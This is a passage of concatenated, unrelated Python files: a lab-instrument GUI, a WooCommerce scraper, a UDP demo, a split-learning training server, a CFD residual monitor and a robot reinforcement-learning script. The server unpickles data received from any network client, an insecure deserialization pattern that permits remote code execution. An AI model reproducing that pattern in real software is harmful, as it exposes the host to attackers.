self.vacuum_buffer.display(variables.vacuum_buffer)
self.vacuum_buffer_back.display('{:.2e}'.format(variables.vacuum_buffer_backing))
self.vacuum_load_lock.display('{:.2e}'.format(variables.vacuum_load_lock))
self.vacuum_load_lock_back.display('{:.2e}'.format(variables.vacuum_load_lock_backing))
if variables.flag_pump_load_lock_led == False:
self.led_pump_load_lock.setPixmap(self.led_red)
self.pump_load_lock_switch.setEnabled(True)
variables.flag_pump_load_lock_led = None
elif variables.flag_pump_load_lock_led == True:
self.led_pump_load_lock.setPixmap(self.led_green)
self.pump_load_lock_switch.setEnabled(True)
variables.flag_pump_load_lock_led = None
# Clean up the error message
if variables.index_warning_message == 15:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" "
"color:#ff0000;\"></span></p></body></html>"))
variables.index_warning_message = 0
variables.index_warning_message += 1
try:
# Update the setup parameters
variables.ex_time = int(float(self.ex_time.text()))
variables.user_name = self.ex_user.text()
variables.ex_freq = int(float(self.ex_freq.text()))
variables.max_ions = int(float(self.max_ions.text()))
variables.vdc_min = int(float(self.vdc_min.text()))
variables.detection_rate = float(self.detection_rate_init.text())
variables.hit_display = int(float(self.hit_displayed.text()))
variables.pulse_fraction = int(float(self.pulse_fraction.text())) / 100
variables.pulse_frequency = float(self.pulse_frequency.text())
variables.hdf5_path = self.ex_name.text()
variables.email = self.email.text()
variables.cycle_avg = int(float(self.cycle_avg.text()))
variables.vdc_step_up = int(float(self.vdc_steps_up.text()))
variables.vdc_step_down = int(float(self.vdc_steps_down.text()))
variables.v_p_min = int(float(self.vp_min.text()))
variables.v_p_max = int(float(self.vp_max.text()))
variables.counter_source = str(self.counter_source.currentText())
if variables.counter_source == 'Pulse Counter':
variables.counter_source = 'pulse_counter'
if self.tweet.currentText() == 'Yes':
variables.tweet = True
elif self.tweet.currentText() == 'No':
variables.tweet = False
if self.criteria_time.isChecked():
variables.criteria_time = True
elif not self.criteria_time.isChecked():
variables.criteria_time = False
if self.criteria_ions.isChecked():
variables.criteria_ions = True
elif not self.criteria_ions.isChecked():
variables.criteria_ions = False
if self.criteria_vdc.isChecked():
variables.criteria_vdc = True
elif not self.criteria_vdc.isChecked():
variables.criteria_vdc = False
# Show error message for V_dc higher than 20Kv
if int(float(self.vdc_max.text())) > 20000:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">Maximum possible "
"number is 20KV</span></p></body></html>"))
self.vdc_max.setText(_translate("OXCART", str(variables.vdc_max)))
else:
variables.vdc_max = int(float(self.vdc_max.text()))
# Show error message for V_p higher than 3281
if float(self.vp_max.text()) > 3281:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">Maximum possible "
"number is 3281 V</span></p></body></html>"))
self.vp_max.setText(_translate("OXCART", str(variables.v_p_max)))
else:
variables.v_p_max = int(float(self.vp_max.text()))
except:
print(
f"{initialize_devices.bcolors.FAIL}Error: Cannot update setup parameters{initialize_devices.bcolors.ENDC}")
def update_cameras(self, ):
"""
The function for updating cameras in the GUI
"""
self.cam_s_o.setImage(variables.img0_orig, autoRange=False)
self.cam_b_o.setImage(variables.img1_orig, autoRange=False)
self.camera0_zoom = QImage(variables.img0_zoom, 1200, 500, QImage.Format_RGB888)
self.camera1_zoom = QImage(variables.img1_zoom, 1200, 500, QImage.Format_RGB888)
self.camera0_zoom = QtGui.QPixmap(self.camera0_zoom)
self.camera1_zoom = QtGui.QPixmap(self.camera1_zoom)
self.cam_s_d.setPixmap(self.camera0_zoom)
self.cam_b_d.setPixmap(self.camera1_zoom)
class MainThread(QThread):
"""
A class for creating main_thread
The run method create thread of main function in the OXCART script
"""
signal = pyqtSignal('PyQt_PyObject')
def __init__(self, ):
QThread.__init__(self, )
# run method gets called when we start the thread
def run(self):
main_thread = oxcart.main()
self.signal.emit(main_thread)
if __name__ == "__main__":
# Initialize global experiment variables
variables.init()
# Cryovac initialized
try:
com_port_cryovac = serial.Serial(
port=initialize_devices.com_ports[variables.com_port_idx_cryovac].device, # chosen COM port
baudrate=9600, # 115200
bytesize=serial.EIGHTBITS, # 8
parity=serial.PARITY_NONE, # N
stopbits=serial.STOPBITS_ONE # 1
)
initialize_devices.initialize_cryovac(com_port_cryovac)
except Exception as e:
print('Can not initialize the Cryovac')
print(e)
# Main and Buffer vacuum gauges
try:
initialize_devices.initialize_pfeiffer_gauges()
except Exception as e:
print('Can not initialize the Pfeiffer gauges')
print(e)
# Buffer Backing vacuum gauges
try:
initialize_devices.initialize_edwards_tic_buffer_chamber()
except Exception as e:
print('Can not initialize the buffer vacuum gauges')
print(e)
# Load Lock vacuum gauges
try:
initialize_devices.initialize_edwards_tic_load_lock()
except Exception as e:
print('Can not initialize the Edwards gauges')
print(e)
# Cameras thread
try:
# Limits the amount of cameras used for grabbing.
# The bandwidth used by a FireWire camera device can be limited by adjusting the packet size.
maxCamerasToUse = 2
# The exit code of the sample application.
exitCode = 0
# Get the transport layer factory.
tlFactory = pylon.TlFactory.GetInstance()
# Get all attached devices and exit application if no device is found.
devices = tlFactory.EnumerateDevices()
if len(devices) == 0:
raise pylon.RuntimeException("No camera present.")
# Create an array of instant cameras for the found devices and avoid exceeding a maximum number of devices.
cameras = pylon.InstantCameraArray(min(len(devices), maxCamerasToUse))
# Create and attach all Pylon Devices.
for i, cam in enumerate(cameras):
cam.Attach(tlFactory.CreateDevice(devices[i]))
converter = pylon.ImageFormatConverter()
# converting to opencv bgr format
converter.OutputPixelFormat = pylon.PixelType_BGR8packed
converter.OutputBitAlignment = pylon.OutputBitAlignment_MsbAligned
camera = Camera(devices, tlFactory, cameras, converter)
except:
print('Can not initialize the Cameras')
# Thread for reading cameras
lock2 = threading.Lock()
camera_thread = threading.Thread(target=camera.update_cameras, args=(lock2,))
camera_thread.setDaemon(True)
camera_thread.start()
lock1 = threading.Lock()
# Thread for reading gauges
gauges_thread = threading.Thread(target=initialize_devices.gauges_update, args=(lock1, com_port_cryovac))
gauges_thread.setDaemon(True)
gauges_thread.start()
app = QtWidgets.QApplication(sys.argv)
# get display resolution
screen_resolution = app.desktop().screenGeometry()
width, height = screen_resolution.width(), screen_resolution.height()
print('Screen size is:(%s,%s)' % (width, height))
OXCART = QtWidgets.QMainWindow()
lock = threading.Lock()
ui = Ui_OXCART(camera.devices, camera.tlFactory, camera.cameras, camera.converter, lock)
ui.setupUi(OXCART)
OXCART.show()
sys.exit(app.exec_())
|
woocommerce.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@File : woocommerce.py
@Contact : douniwan@douniwan.com
@License : (C)Copyright 2021-2031, Dou-Ni-Wan
@Modify Time @Author @Version @Description
------------ ------- -------- -----------
2021/3/18 11:58 yqz 1.0 None
"""
# import lib
import json
import re
import threading
import time
import traceback
import openpyxl
import requests
import export_constants as ec
from bs4 import BeautifulSoup
class WooCommerce:
def __init__(self, site_url):
self.ses = requests.Session()
self.ses.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'})
site_url = site_url.rstrip('/')
self.shop_url = f'{site_url}/shop'
self.max_page = self.__get_max_page()
self.export_headers = ec.shopify_headers
def __get_max_page(self):
res = self.ses.get(self.shop_url)
res.raise_for_status()
soup = BeautifulSoup(res.text, features='lxml')
max_page = 0
for s in soup.find_all('a', class_='page-number'):
if s.string:
number_str = re.sub('[^0-9]', '', s.string)
max_page = max_page if max_page > int(number_str) else int(number_str)
return max_page
def __get_page_data(self, page_list, data_list):
for page_index in page_list:
page_response = self.ses.get(f'{self.shop_url}/page/{page_index}/')
page_response.raise_for_status()
page_soup = BeautifulSoup(page_response.text, features='lxml')
# for div in page_soup.find_all('p', class_='product-title'):
# print(div)
for p in page_soup.select('p.product-title a'):
data_list.append({'title': p.string, 'href': p['href']})
def __get_product_detail(self, data_list, item_list):
for d in data_list:
product_detail = self.ses.get(d['href'])
product_detail.raise_for_status()
detail_soup = BeautifulSoup(product_detail.text, features='lxml')
tag_list = []
for tag_a in detail_soup.select('nav.woocommerce-breadcrumb.breadcrumbs.uppercase a'):
tag_list.append(tag_a.string)
option_list = []
for tag_label in detail_soup.select('table.variations label'):
option_list.append((tag_label['for'], tag_label.string))
option_list.sort(key=lambda k: k[1])
option_key_0, option_name_0 = (f'attribute_{option_list[0][0]}', option_list[0][1]) if len(
option_list) > 0 else ('x', '')
option_key_1, option_name_1 = (f'attribute_{option_list[1][0]}', option_list[1][1]) if len(
option_list) > 1 else ('x', '')
option_key_2, option_name_2 = (f'attribute_{option_list[2][0]}', option_list[2][1]) if len(
option_list) > 2 else ('x', '')
form = detail_soup.find(class_='variations_form cart')
product_tittle = d['title']
handle = re.sub('[^0-9a-zA-Z]', '-', product_tittle).lower()
m_product = {'0': handle, '1': product_tittle, '2': '', '5': ','.join(tag_list),
'6': 'TRUE',
'7': option_name_0, '8': option_name_0, '9': option_name_1,
'10': option_name_1, '11': option_name_2, '12': option_name_2}
# {'5': product_tittle, '6': product_tittle, '8': 'N', '9': 'Y', '10': 'N', '11': '0', '12': 'N',
# '13': '2', '15': ','.join(tag_list), '18': 'M',
# '19': option_name_0, '20': option_name_1, '21': option_name_2,
# '47': form['data-product_id'] if form.has_attr('data-product_id') else ''}
desc = ''
description_tag = detail_soup.select_one('div#tab-description')
if description_tag:
desc = description_tag.text
p_products = []
if form and form.has_attr('data-product_variations'):
detail_json = json.loads(form['data-product_variations'])
for ds in detail_json:
# product_item = {'0': ds['variation_id'], '1': d['title'], '15': ','.join(tag_list), '18': 'P'}
product_item = {'0': handle, '1': product_tittle, '2': desc, '5': ','.join(tag_list),
'6': 'TRUE',
'7': option_name_0, '8': option_name_0, '9': option_name_1,
'10': option_name_1, '11': option_name_2, '12': option_name_2}
attr = ds['attributes']
if attr:
product_item['8'] = attr[option_key_0] if option_key_0 in attr else ''
product_item['10'] = attr[option_key_1] if option_key_1 in attr else ''
product_item['12'] = attr[option_key_2] if option_key_2 in attr else ''
product_item['19'] = ds['display_price']
product_item['20'] = ds['display_regular_price']
product_item['13'] = ds['sku']
product_item['14'] = ds['weight']
product_item['16'] = 0
product_item['17'] = 'continue'
product_item['18'] = 'manual'
product_item['21'] = 'TRUE'
product_item['22'] = 'manual'
product_item['24'] = ds['image']['src'] if ds['image'] and 'src' in ds['image'] else ''
product_item['26'] = ds['image']['alt'] if ds['image'] and 'alt' in ds['image'] else ''
product_item['27'] = 'FALSE'
product_item['28'] = product_tittle
product_item['29'] = product_tittle
product_item['43'] = product_item['24']
product_item['47'] = ds['variation_id']
product_item['48'] = 'P'
p_products.append(product_item)
# if not len(p_products):
# m_product['18'] = 'S'
# item_list.append(m_product)
item_list += p_products
def __export_all_data(self):
result = []
try:
ds = []
thread_cnt = 60
# //self.max_page
total_page_index = [i for i in range(1, 10 + 1)]
page_list = [total_page_index[i::thread_cnt] for i in range(thread_cnt)]
page_threads = []
for thread_id in range(len(page_list)):
page_threads.append(
threading.Thread(target=self.__get_page_data, args=(page_list[thread_id], ds,)))
for t in page_threads:
t.setDaemon(True)
t.start()
for t in page_threads:
t.join()
print(f'get data list end {len(ds)}')
little_list = [ds[i::thread_cnt] for i in range(thread_cnt)]
threads = []
for thread_id in range(len(little_list)):
threads.append(
threading.Thread(target=self.__get_product_detail, args=(little_list[thread_id], result,)))
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
# for i in result:
# print(i)
except Exception as e:
print("save to db error ", e)
traceback.print_exc()
return result
def export_to_excel(self, file_name):
all_data = self.__export_all_data()
wb = openpyxl.Workbook()
sheet = wb.create_sheet('export', 0)
# item_dict.has_pic,item_dict.has_video, item_dict.save_path,
# template_wb = openpyxl.load_workbook('product_import_template_shoplazza.xlsx', read_only=True)
# template_sheet = template_wb.worksheets[0]
# sheet.append()
for i in range(len(self.export_headers)):
sheet.cell(1, i + 1, self.export_headers[i])
row = 1
for d_item in all_data:
row += 1
for i in range(len(self.export_headers)):
sheet.cell(row, i + 1, d_item[str(i)] if str(i) in d_item else '')
# output_file_name = f'{save_xlsx_path}\\result.xlsx'
wb.save(rf'export\{file_name}')
wb.close()
print(f'output {file_name} success >>>>>> ')
def test(self):
self.__get_product_detail([{'href': 'https://gifnest.com/product/kb-jd13-sneaker/', 'title': 'xxx'}], [])
if __name__ == '__main__':
wo = WooCommerce('https://gifnest.com/')
# wo.test()
now = time.strftime('%Y%m%d%H%M%S')
wo.export_to_excel(f'export_{now}.xlsx')
|
udpSocket.py
|
import socket
import threading
def udpRecvfromData():
ip_port = ("", 10025)
udpRecv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
udpRecv.bind(ip_port)
while True:
print("wait revcData……")
data, sourceAddr = udpRecv.recvfrom(1024)
print(str(data, "utf-8"))
udpRecv.close()
def udpSendtoData():
ip_port = ("127.0.0.1", 10025)
udpSend = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
while True:
inp = input("数据:").strip()
if inp == "exit":
break
print(inp)
udpSend.sendto(bytes(inp, encoding="utf-8"), ip_port)
udpSend.close()
# 开启一个线程循环接收数据
recvThread = threading.Thread(target=udpRecvfromData, name="RecvfromDataThread")
recvThread.start()
sendtoThread = threading.Thread(target=udpSendtoData, name="SendtoDataThread")
sendtoThread.start()
|
Server.py
|
import socket
import struct
import pickle
import numpy as np
import json
import torch
import torch.nn as nn
from torch.optim import Adam, SGD
from threading import Thread
import time
#load data from json file
f = open('parameter_server.json', )
data = json.load(f)
#set parameters fron json file
host = data["host"]
port = data["port"]
max_recv = data["max_recv"]
lr = data["learningrate"]
update_treshold = data["update_threshold"]
max_numclients = data["max_nr_clients"]
class Decode(nn.Module):
"""
decoder model
"""
def __init__(self):
super(Decode, self).__init__()
self.t_convx = nn.ConvTranspose2d(4, 8, 1, stride=1)
self.t_conva = nn.ConvTranspose2d(8, 16, 1, stride=1)
self.t_convb = nn.ConvTranspose2d(16, 64, 1, stride=1)
def forward(self, x):
x = self.t_convx(x)
x = self.t_conva(x)
x = self.t_convb(x)
return x
class Server(nn.Module):
"""
server model
"""
def __init__(self):
super(Server, self).__init__()
self.conv4 = nn.Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1))
self.relu4 = nn.ReLU()
self.norm4 = nn.BatchNorm2d(64)
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
self.drop2 = nn.Dropout2d(0.3)
self.conv5 = nn.Conv2d(64, 128, kernel_size=(3, 3), stride=(1, 1))
self.relu5 = nn.ReLU()
self.norm5 = nn.BatchNorm2d(128)
self.conv6 = nn.Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1))
self.relu6 = nn.ReLU()
self.norm6 = nn.BatchNorm2d(128)
self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
self.drop3 = nn.Dropout2d(0.4)
self.linear1 = nn.Linear(in_features=128, out_features=43, bias=True)
def forward(self, x):
x = self.conv4(x)
x = self.relu4(x)
x = self.norm4(x)
x = self.pool2(x)
x = self.drop2(x)
x = self.conv5(x)
x = self.relu5(x)
x = self.norm5(x)
x = self.conv6(x)
x = self.relu6(x)
x = self.norm6(x)
x = self.pool3(x)
x = self.drop3(x)
x = x.view(x.size(0), -1)
x = nn.functional.log_softmax(self.linear1(x), dim=1)
return x
class initial_Client(nn.Module):
"""
initial client model with the actual weights
"""
def __init__(self):
super(initial_Client, self).__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
self.relu1 = nn.ReLU()
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
self.norm1 = nn.BatchNorm2d(32)
self.conv2 = nn.Conv2d(32, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
self.relu2 = nn.ReLU()
self.norm2 = nn.BatchNorm2d(32)
self.drop1 = nn.Dropout2d(0.2)
self.conv3 = nn.Conv2d(32, 64, kernel_size=(3, 3), stride=(1, 1))
self.relu3 = nn.ReLU()
self.norm3 = nn.BatchNorm2d(64)
def forward(self, x):
x = self.conv1(x)
x = self.relu1(x)
x = self.pool1(x)
x = self.norm1(x)
x = self.conv2(x)
x = self.relu2(x)
x = self.norm2(x)
x = self.drop1(x)
x = self.conv3(x)
x = self.relu3(x)
x = self.norm3(x)
return x
def send_msg(sock, content):
"""
pickles the content (creates bitstream), adds header and send message via tcp port
:param sock: socket
:param content: content to send via tcp port
"""
msg = pickle.dumps(content)
msg = struct.pack('>I', len(msg)) + msg # add 4-byte length in netwwork byte order
sock.sendall(msg)
def recieve_msg(sock):
"""
recieves the meassage with helper function, unpickles the message and separates
the getid from the actual massage content
calls the request handler
:param
sock: socket
:return: none
"""
msg = recv_msg(sock) # receive client message from socket
msg = pickle.loads(msg)
getid = msg[0]
content = msg[1]
handle_request(sock, getid, content)
def recv_msg(sock):
"""
gets the message length (which corresponds to the first for bytes of the recieved bytestream) with the recvall function
:param
sock: socket
:return: returns the data retrieved from the recvall function
"""
raw_msglen = recvall(sock, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
return recvall(sock, msglen)
def recvall(sock, n):
"""
returns the data from a recieved bytestream, helper function to receive n bytes or return None if EOF is hit
:param sock: socket
:param n: length in bytes (number of bytes)
:return: message
"""
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
def handle_request(sock, getid, content):
"""
executes the requested function, depending on the get id, and passes the recieved message
:param sock: socket
:param getid: id of the function, that should be executed if the message is recieved
:param content: message content
"""
switcher = {
0: calc_gradients,
1: get_testacc,
2: updateclientmodels,
}
switcher.get(getid, "invalid request recieved")(sock, content)
def get_testacc(conn, msg):
"""
this method does the forward propagation with the recieved data, from to first layer of the decoder to the last layer
of the model. It sends information about loss/accuracy back to the client.
:param conn: connection
:param msg: message
"""
with torch.no_grad():
client_output_test, label_test = msg['client_output_test'], msg['label_test']
client_output_test, label_test = client_output_test.to(device), label_test.to(device)
client_output_test = decode(client_output_test) #
client_output_test = client_output_test.clone().detach().requires_grad_(True)
output_test = server(client_output_test)
loss_test = error(output_test, label_test)
test_loss = loss_test.data
correct_test = torch.sum(output_test.argmax(dim=1) == label_test).item()
msg = {"test_loss": test_loss,
"correct_test": correct_test,
}
send_msg(conn, msg)
def updateclientmodels(sock, updatedweights):
"""
send the actual clientside weights to all connected clients,
except from the clint that is currently training
:param sock: the socket
:param updatedweights: the client side weghts with actual status
"""
client.load_state_dict(updatedweights)
for clientss in connectedclients:
try:
if clientss != sock:
send_msg(clientss, updatedweights)
except:
pass
def calc_gradients(conn, msg):
"""
this method does the forward propagation with the recieved data,
from to first layer of the decoder to the last layer
of the model. it calculates the loss, and does the backward propagation up to the
cutlayer of the model.
Depending on if the loss threshold is reached it sends the gradient of the back
propagation at the cut layer and
information about loss/accuracy/trainingtime back to the client.
:param conn: the connected socket of the currently training client
:param msg: the recieved data
"""
start_time_training = time.time()
optimizer.zero_grad()
with torch.no_grad():
client_output_train, label_train, batchsize, batch_concat = msg['client_output_train'], msg['label_train'], msg[
'batchsize'], msg['batch_concat'] # client output tensor
client_output_train, label_train = client_output_train.to(device), label_train
client_output_train = decode(client_output_train)
splittensor = torch.split(client_output_train, batchsize, dim=0)
dc = 0
while dc < batch_concat:
tenss = splittensor[dc]
tenss = tenss.requires_grad_(True)
tenss = tenss.to(device)
output_train = server(tenss) # forward propagation
with torch.no_grad():
lbl_train = label_train[dc].to(device)
loss_train = error(output_train, lbl_train) # calculates cross-entropy loss
train_loss = loss_train.data
loss_train.backward() # backward propagation
client_grad = tenss.grad.clone().detach()
optimizer.step()
add_correct_train = torch.sum(output_train.argmax(dim=1) == lbl_train).item()
add_total_train = len(lbl_train)
total_training_time = time.time() - start_time_training
if train_loss.item() > update_treshold:
pass
else:
client_grad = "abort"
msg = {"grad_client": client_grad,
"train_loss": train_loss,
"add_correct_train": add_correct_train,
"add_total_train": add_total_train,
"active_trtime_batch_server": total_training_time,
}
print("Create the msg")
send_msg(conn, msg)
print("Send the msg back")
dc += 1
def initialize_client(conn):
"""
called when new client connect. if new connected client is not the first connected
client, the send the initial weights to
the new connected client
:param conn:
"""
print("connected clients: ",len(connectedclients))
if len(connectedclients) == 1:
msg = 0
else:
initial_weights = client.state_dict()
msg = initial_weights
send_msg(conn, msg)
def clientHandler(conn, addr):
initialize_client(conn)
while True:
try:
recieve_msg(conn)
except:
print("No message, wait!")
pass
connectedclients = []
trds = []
def main():
"""
initialize device, server model, initial client model, optimizer, loss, decoder and accepts new clients
"""
print(torch.version.cuda)
global device
device = 'cpu'
#torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
if (torch.cuda.is_available()):
print("training on gpu")
seed = 0
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
global server
server = Server()
server.to(device)
global client
client = initial_Client()
client.to(device)
print("initial_Client complete.")
global optimizer
optimizer = SGD(server.parameters(), lr=lr, momentum=0.9)
global error
error = nn.CrossEntropyLoss()
print("Calculate CrossEntropyLoss complete.")
global decode
decode = Decode()
decode.load_state_dict(torch.load("./convdecoder.pth"))
decode.eval()
decode.to(device)
print("Load decoder parameters complete.")
s = socket.socket()
s.bind((host, port))
s.listen(max_numclients)
print("Listen to client reply.")
for i in range(max_numclients):
conn, addr = s.accept()
connectedclients.append(conn)
print('Conntected with', addr)
t = Thread(target=clientHandler, args=(conn, addr))
print('Thread established')
trds.append(t)
t.start()
print('Thread start')
for t in trds:
t.join()
if __name__ == '__main__':
main()
|
monitor.py
|
import sys
sys.path.append(r"/public1/home/sc90898/OpenFOAMWorkspace/sc90898-7/utilities/")
import signal
import multiprocessing as mp
import time
from residual_monitor import read_residuals,plot_multiple_residuals,quit
log="run.log"
pressure_name="p_rgh"
nCorrectors=1
interval=20
sample_size=300
# m_residuals=[["h"],["Ux","Uy",pressure_name]]
# m_residuals=[["h"],["Ux",pressure_name]]
m_residuals=[["h","CO2","O2"]]
m_thresholds=[[1e-3,1e-4,1e-5,1e-6,1e-7]]
m_save_files=["residuals1.jpg"]
def process_fun():
line_offset=0
iterations_offset=0
while True:
df,line_offset,iterations,info=read_residuals(log,line_offset,pressure_name,nCorrectors,sample_size)
if "cum_physical_time" in info.keys():
physical_time=info["cum_physical_time"]
else:
physical_time="not found"
if "cum_execution_time" in info.keys():
execution_time=info["cum_execution_time"]
else:
execution_time="not found"
title=f"physical time : {physical_time} s, execution time : {execution_time} s"
titles=[title]*len(m_residuals)
if "latest_delta_time" in info.keys():
delta_time=info["latest_delta_time"]
else:
delta_time= "not found"
if "maxCo" in info.keys():
maxCo=info["maxCo"]
else:
maxCo="not found"
if "meanCo" in info.keys():
meanCo=info["meanCo"]
else:
meanCo="not found"
if "minT" in info.keys():
minT=info["minT"]
maxT=info["maxT"]
else:
minT="not found"
maxT="not found"
if "coke" in info.keys():
residual_coke=info["coke"]
else:
residual_coke="not found"
text=f"latest_delta_time: {delta_time} s \n" + \
f"mean CFL num: {meanCo}\n" + \
f"max CFL num: {maxCo}\n" + \
f"min T: {minT}, max T: {maxT}\n" + \
f"residual coke: {residual_coke}"
texts=[text]*len(m_residuals)
plot_multiple_residuals(df,iterations_offset,m_residuals,m_thresholds,titles,texts,m_save_files)
iterations_offset+=iterations
time.sleep(interval)
if __name__=="__main__":
try:
signal.signal(signal.SIGINT,quit)
signal.signal(signal.SIGTERM,quit)
p=mp.Process(target=process_fun)
p.start()
p.deamon=True
while True:
pass
except Exception as err:
print(f"Error Message: {err}")
|
ur5_train.py
|
import numpy as np
import torch
import argparse
import os
import time
import json
import threading
from sac_rad import SacRadAgent
import utils
from logger import Logger
import torch.multiprocessing as mp
from configs.ur5_config import config
from envs.ur5_wrapper import UR5Wrapper
def parse_args():
parser = argparse.ArgumentParser()
# environment
parser.add_argument('--setup', default='Visual-UR5')
parser.add_argument('--ip', default='129.128.159.210', type=str)
parser.add_argument('--camera_id', default=1, type=int)
parser.add_argument('--image_width', default=160, type=int)
parser.add_argument('--image_height', default=90, type=int)
parser.add_argument('--target_type', default='reaching', type=str)
parser.add_argument('--random_action_repeat', default=1, type=int)
parser.add_argument('--agent_action_repeat', default=1, type=int)
parser.add_argument('--image_history', default=3, type=int)
parser.add_argument('--joint_history', default=1, type=int)
parser.add_argument('--ignore_joint', default=False, action='store_true')
parser.add_argument('--episode_length', default=4.0, type=float)
parser.add_argument('--dt', default=0.04, type=float)
# replay buffer
parser.add_argument('--replay_buffer_capacity', default=100000, type=int)
parser.add_argument('--rad_offset', default=0.01, type=float)
# train
parser.add_argument('--init_step', default=1000, type=int)
parser.add_argument('--env_step', default=100000, type=int)
parser.add_argument('--batch_size', default=128, type=int)
parser.add_argument('--async', default=False, action='store_true')
parser.add_argument('--max_update_freq', default=10, type=int)
# critic
parser.add_argument('--critic_lr', default=3e-4, type=float)
parser.add_argument('--critic_tau', default=0.01, type=float)
parser.add_argument('--critic_target_update_freq', default=2, type=int)
# actor
parser.add_argument('--actor_lr', default=3e-4, type=float)
parser.add_argument('--actor_update_freq', default=2, type=int)
# encoder
parser.add_argument('--encoder_tau', default=0.05, type=float)
# sac
parser.add_argument('--discount', default=0.99, type=float)
parser.add_argument('--init_temperature', default=0.1, type=float)
parser.add_argument('--alpha_lr', default=1e-4, type=float)
# misc
parser.add_argument('--seed', default=9, type=int)
parser.add_argument('--work_dir', default='.', type=str)
parser.add_argument('--save_tb', default=False, action='store_true')
parser.add_argument('--save_model', default=False, action='store_true')
#parser.add_argument('--save_buffer', default=False, action='store_true')
parser.add_argument('--save_model_freq', default=10000, type=int)
parser.add_argument('--load_model', default=-1, type=int)
parser.add_argument('--device', default='', type=str)
parser.add_argument('--lock', default=False, action='store_true')
args = parser.parse_args()
return args
def main():
args = parse_args()
utils.set_seed_everywhere(args.seed)
env = UR5Wrapper(
setup = args.setup,
ip = args.ip,
seed = args.seed,
camera_id = args.camera_id,
image_width = args.image_width,
image_height = args.image_height,
target_type = args.target_type,
image_history = args.image_history,
joint_history = args.joint_history,
episode_length = args.episode_length,
dt = args.dt,
ignore_joint = args.ignore_joint,
)
if not args.async:
version = 'SACv0'
elif args.async and args.lock:
version = 'SACv1'
elif args.async:
version = 'SACv2'
else:
raise NotImplementedError('Not supported mode!')
args.work_dir += f'/results/{version}_{args.target_type}_' \
f'dt={args.dt}_bs={args.batch_size}_' \
f'dim={args.image_width}*{args.image_height}_{args.seed}/'
utils.make_dir(args.work_dir)
model_dir = utils.make_dir(os.path.join(args.work_dir, 'model'))
buffer_dir = utils.make_dir(os.path.join(args.work_dir, 'buffer'))
with open(os.path.join(args.work_dir, 'args.json'), 'w') as f:
json.dump(vars(args), f, sort_keys=True, indent=4)
if args.device is '':
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
else:
device = torch.device(args.device)
agent = SacRadAgent(
obs_shape=env.observation_space.shape,
state_shape=env.state_space.shape,
action_shape=env.action_space.shape,
device=device,
training_steps=args.env_step // args.agent_action_repeat,
net_params=config,
discount=args.discount,
init_temperature=args.init_temperature,
alpha_lr=args.alpha_lr,
actor_lr=args.actor_lr,
actor_update_freq=args.actor_update_freq,
critic_lr=args.critic_lr,
critic_tau=args.critic_tau,
critic_target_update_freq=args.critic_target_update_freq,
encoder_tau=args.encoder_tau,
rad_offset=args.rad_offset,
)
L = Logger(args.work_dir, use_tb=args.save_tb)
if args.async:
agent.share_memory()
# easily transfer step information to 'async_recv_data'
def recv_from_update(buffer_queue, L, stop):
while True:
if stop():
break
stat_dict = buffer_queue.get()
for k, v in stat_dict.items():
L.log(k, v, step)
# initialize processes in 'spawn' mode, required by CUDA runtime
ctx = mp.get_context('spawn')
MAX_QSIZE = 3
input_queue = ctx.Queue(MAX_QSIZE)
output_queue = ctx.Queue(MAX_QSIZE)
tensor_queue = ctx.Queue(MAX_QSIZE)
if args.lock:
sync_queue = ctx.Queue(1)
sync_queue.put(1)
else:
sync_queue = None
# initialize data augmentation process
replay_buffer_process = ctx.Process(target=utils.AsyncRadReplayBuffer,
args=(
env.observation_space.shape,
env.state_space.shape,
env.action_space.shape,
args.replay_buffer_capacity,
args.batch_size,
args.rad_offset,
device,
input_queue,
tensor_queue,
args.init_step,
args.max_update_freq,
sync_queue
)
)
replay_buffer_process.start()
# initialize SAC update process
update_process = ctx.Process(target=agent.async_update,
args=(tensor_queue, output_queue, sync_queue))
update_process.start()
# flag for whether stop threads
stop = False
# initialize training statistics receiving thread
stat_recv_thread = threading.Thread(target=recv_from_update, args=(output_queue, L, lambda: stop))
stat_recv_thread.start()
else:
replay_buffer = utils.RadReplayBuffer(
obs_shape=env.observation_space.shape,
state_shape=env.state_space.shape,
action_shape=env.action_space.shape,
capacity=args.replay_buffer_capacity,
batch_size=args.batch_size,
rad_offset=args.rad_offset,
device=device
)
episode, episode_reward, episode_step, done = 0, 0, 0, True
start_time = time.time()
obs, state = env.reset()
for step in range(args.env_step + 1 + args.init_step):
# sample action for data collection
if step < args.init_step:
if step % args.random_action_repeat == 0:
action = env.action_space.sample()
else:
with utils.eval_mode(agent):
if step % args.agent_action_repeat == 0:
action = agent.sample_action(obs, state)
# step in the environment
next_obs, next_state, reward, done, _ = env.step(action)
episode_reward += reward
if args.async:
input_queue.put((obs, state, action, reward, next_obs, next_state, done))
else:
replay_buffer.add(obs, state, action, reward, next_obs, next_state, done)
